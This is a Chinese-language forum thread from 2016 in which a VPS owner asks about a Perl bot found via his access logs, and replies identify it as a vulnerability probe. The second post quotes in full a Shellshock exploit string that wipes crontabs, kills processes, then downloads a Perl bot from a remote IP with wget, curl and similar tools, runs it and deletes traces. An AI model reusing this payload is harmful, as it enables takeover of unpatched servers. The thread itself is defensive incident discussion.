首页 注册 登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
通过以下 Referral 链接购买 DigitalOcean 主机,你将可以帮助 V2EX 持续发展
DigitalOcean - SSD Cloud Servers
badcode
V2EX  ›  VPS

vps 被扫,懂 perl 的 v 友有空可以进来看下是什么意思吗?

  •   
  •   badcode · 2016-05-02 13:43:13 +08:00 · 399 次点击
    这是一个创建于 3118 天前的主题,其中的信息可能已经有所发展或是发生改变。
    http://31.184.194.100/batman-vs-superman
    日志里看到的,下载是 batman-vs-superman.pl
    看到几个关键字,代理, DCC , DoS...

    知道的朋友可以说下大概意思吗?
  • perl
  • VPS
  • 意思
  • dcc
    4 条回复    2016-05-03 09:41:46 +08:00
    msg7086
        1
    msg7086  
       2016-05-02 20:56:44 +08:00   ❤️ 1
    简单说,就是可以到进局子里蹲着的事情。
    备份好数据赶紧重装就是啦。
    badcode
        2
    badcode  
    OP
       2016-05-03 02:28:36 +08:00
    @msg7086 别吓我呀
    下面是其中一条日志,上面的链接就是我直接粘贴复制找到的
    31.184.195.114 - - [30/Apr/2016:09:39:22 +0800] "GET /phppath/php4 HTTP/1.1" 403 162 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22crontab -r;killall -9 php perl; cd /tmp/ ; mkdir bat-mobile ; cd /tmp/bat-mobile ; wget http://31.184.194.100/batman-vs-superman ; perl batman-vs-superman ; lwp-download http://31.184.194.100/batman-vs-superman ; fetch http://31.184.194.100/batman-vs-superman ; curl -O http://31.184.194.100/batman-vs-superman ; perl batman-vs-superman;cd /tmp/;rm -rf bat*\x22);'"

    结合上面的脚本和日志
    能否说下我该怎么排查吗?

    非常感谢!!!
    msg7086
        3
    msg7086  
       2016-05-03 04:41:11 +08:00   ❤️ 1
    @badcode 这只是在试探漏洞而已。如果你打了补丁的话不会中招的。
    badcode
        4
    badcode  
    OP
       2016-05-03 09:41:46 +08:00 via iPhone
    好的,感谢回复
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1058 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 22ms · UTC 22:26 · PVG 06:26 · LAX 14:26 · JFK 17:26
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.